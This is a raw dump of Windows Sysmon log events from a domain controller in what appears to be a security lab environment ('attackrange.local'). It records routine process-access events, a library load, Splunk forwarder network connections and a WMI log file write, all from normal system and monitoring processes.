12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 734700x80000000000000008650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.855{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000008649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F9-6064-0B01-00000000AE01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F9-6064-0B01-00000000AE01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F9-6064-0B01-00000000AE01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.731{266CAFBE-64F9-6064-0B01-00000000AE01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000008641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.585{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53602-false10.0.1.12-8000- 354300x80000000000000008640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.185{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53601-false10.0.1.12-8000- 354300x80000000000000008639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.813{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53600-false10.0.1.12-8000- 23542300x80000000000000008638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.558{266CAFBE-646C-6064-1300-00000000AE01}1228NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Windows\System32\LogFiles\WMI\SUM.etlMD5=6E670A5B35EE5D8F2D7319388377E251,SHA256=80596A4ABC86218D1BF43A2006230CF12DE395AD29645499B24BA6F5E1A4A02D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.527{266CAFBE-64F7-6064-0801-00000000AE01}42805468C:\Windows\system32\sppsvc.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+7ec28|C:\Windows\system32\sppsvc.exe+749f0|C:\Windows\system32\sppsvc.exe+95a0e|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+78e23|C:\Windows\system32\RPCRT4.dll+d96bd|C:\Windows\system32\RPCRT4.dll+6194c|C:\Windows\system32\RPCRT4.dll+52bf4|C:\Windows\system32\RPCRT4.dll+51b0d|C:\Windows\system32\RPCRT4.dll+523bb|C:\Windows\system32\RPCRT4.dll+2469c|C:\Windows\system32\RPCRT4.dll+24b1c|C:\Windows\system32\RPCRT4.dll+111bc|C:\Windows\system32\RPCRT4.dll+12a1b|C:\Windows\system32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4 10341000x80000000000000008636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.527{266CAFBE-64F7-6064-0801-00000000AE01}42805468C:\Windows\system32\sppsvc.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+74b0a|C:\Windows\system32\sppsvc.exe+959c1|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+78e23|C:\Windows\system32\RPCRT4.dll+d96bd|C:\Windows\system32\RPCRT4.dll+6194c|C:\Windows\system32\RPCRT4.dll+52bf4|C:\Windows\system32\RPCRT4.dll+51b0d|C:\Windows\system32\RPCRT4.dll+523bb|C:\Windows\system32\RPCRT4.dll+2469c|C:\Windows\system32\RPCRT4.dll+24b1c|C:\Windows\system32\RPCRT4.dll+111bc|C:\Windows\system32\RPCRT4.dll+12a1b|C:\Windows\system32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 